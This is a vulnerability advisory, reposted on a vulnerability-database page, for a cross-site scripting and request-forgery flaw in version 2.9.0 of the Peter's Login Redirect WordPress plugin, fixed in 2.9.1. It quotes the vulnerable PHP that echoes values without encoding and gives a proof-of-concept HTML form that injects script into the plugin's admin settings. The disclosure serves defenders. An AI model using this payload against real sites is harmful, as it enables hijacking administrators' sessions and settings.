Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Peter's Login Redirect 2.9.0 XSS / CSRF

🗓️ 15 Aug 2016 00:00:00Reported by Yorick KosterType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login Redirect WordPress Plugin, version 2.9.0 allows attackers to perform various actions and change plugin settings by luring administrators to a malicious website. Issue resolved in version 2.9.1

Code
`------------------------------------------------------------------------  
Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login  
Redirect WordPress Plugin  
------------------------------------------------------------------------  
Yorick Koster, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Scripting vulnerability was found in the Peter's Login  
Redirect WordPress Plugin. This issue allows an attacker to perform a  
wide variety of actions, such as stealing Administrators' session  
tokens, or performing arbitrary actions on their behalf. In addition the  
Plugin is vulnerable to Cross-Site Request Forgery, which allows an  
attacker to change any setting of this plugin. In order to exploit this  
issue, the attacker has to lure/force a logged on WordPress  
Administrator into opening a malicious website.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160724-0028  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on Peter's Login Redirect WordPress  
Plugin version 2.9.0.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue is resolved in Peter's Login Redirect version 2.9.1.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_scripting_cross_site_request_forgery_in_peter_s_login_redirect_wordpress_plugin.html  
  
This issue exists because Peter's Login Redirect lacks protection against Cross-Site Request Forgery attacks. In addition, the plugin lacks proper output encoding, rendering it vulnerable to Cross-Site Scripting. See for example the following code fragment.  
  
elseif( $rul_type == 'role' )  
{  
$rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']" action="?page=' . basename(__FILE__) . '" method="post">';  
$rul_rolevalues .= '<tr>';  
$rul_rolevalues .= '<td><p><input type="hidden" name="rul_role" value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';  
$rul_rolevalues .= '<td>';  
$rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . $rul_url . '" /></p>';  
$rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . $rul_url_logout . '" /></p>';  
$rul_rolevalues .= '</td>';  
$rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit" value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . __( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';  
$rul_rolevalues .= '</tr>';  
$rul_rolevalues .= '</form>';  
  
$rul_roles_existing[$rul_value] = '';  
  
++$i_role;  
}  
  
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.  
Proof of concept  
  
<html>  
<body>  
<form action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php" method="POST">  
<input type="hidden" name="rul_role" value="administrator" />  
<input type="hidden" name="rul_role_address" value=""><script>alert(1);</script>" />  
<input type="hidden" name="rul_role_logout" value="" />  
<input type="hidden" name="rul_role_submit" value="Add role rule" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
------------------------------------------------------------------------  
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its  
goal is to contribute to the security of popular, widely used OSS  
projects in a fun and educational way.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Aug 2016 00:00Current
0.4Low risk
Vulners AI Score0.4
xss csrf security
39